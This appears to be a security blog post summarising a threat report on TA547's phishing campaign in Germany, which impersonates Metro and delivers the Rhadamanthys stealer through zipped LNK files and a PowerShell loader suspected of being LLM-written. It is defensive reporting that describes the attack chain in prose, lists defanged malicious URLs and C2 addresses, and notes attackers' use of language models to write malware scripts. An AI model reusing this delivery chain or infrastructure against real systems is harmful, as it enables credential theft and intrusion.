Threat actor TA547 launched an email phishing campaign in Germany using Rhadamanthys malware, a new information stealer in their arsenal. The emails impersonated German retail giant Metro with invoice-themed subjects and attachments containing password-protected ZIP files.
When the ZIPs were opened, they contained LNK files that, when run, caused PowerShell to download and run a remote script that was thought to have been written by a large language model, which shows how TA547’s strategies are changing, such as their move to compressed LNKs and their use of Rhadamanthys.
TA547, a threat actor group, launched an email campaign targeting German organizations across various industries where the emails contained a password-protected ZIP file that, when opened, triggered a malicious PowerShell script.
The script used a Base64-encoded Rhadamanthys executable file to execute malicious code in memory without ever writing it to disk and the PowerShell script exhibited uncommon characteristics, including grammatically correct and specific comments, suggesting the use of an LLM-enabled tool in its creation.
Large language models (LLMs) might be used to create malicious content, but identifying the culprit (machine vs. human) is challenging but clues exist in the content itself. Machine-generated text often exhibits characteristics that differ from human writing, such as repetitive phrasing and unnatural language.
Fortunately, spotting these signs isn’t crucial for defense, as regardless of the source, the methods for protecting against malicious content remain the same.
TA547, a financially motivated IAB, targets various regions with information thieves and Since 2023, their primary payload has been NetSupport RAT, but they’ve also used StealC and Lumma Stealer.
Their delivery method shifted from zipped JavaScript attachments in 2023 to compressed LNKs in March 2024, and TA547’s attacks target organizations in Germany, Spain, Switzerland, Austria, and the US.
By utilizing compressed LNKs and a new Rhadamanthys stealer in their attack campaign, TA547 highlights a potential new trend: threat actors using content most likely produced by large language models (LLMs) in their attacks.
LLMs could be used to improve attackers’ understanding of existing attack chains, allowing them to adapt these techniques for their own purposes, and similar to LLM-generated social engineering lures, these techniques can be incorporated into overall malicious campaigns.
In this case, the suspected LLM-generated content was a script to deliver the malware, and it didn’t affect the malware itself or how security tools defend against it because many security detections rely on behavior, so the origin of the malicious software doesn’t impact detection capabilities.
Malware with machine-generated code will still set off the same defenses when executed, just like LLM-generated phishing emails do despite mimicking human-written content.
An Emerging Threat signature system found possible Rhadamanthys stealer activity by noticing odd SSL certificates (2854802), attempts to steal data (2853002), payload communication responses (2853001), and download requests (2043202).
Investigators at Proofpoint discovered indicators of compromise (IOCs) such as a malicious PowerShell payload URL (hxxps://bolibachan[.]com/g[.]txt), Rhadamanthys command-and-control (C2) servers (indscpm[.]xyz, 94.131.104.223:443), all detected on March 26th, 2024.
Never forget to check out our YouTube channel, ETHICAL EMPIRE, and keep reading our exciting blogs. Until next time, stay curious, stay secure, and keep exploring the fascinating world of cyber security. See you soon, bye!
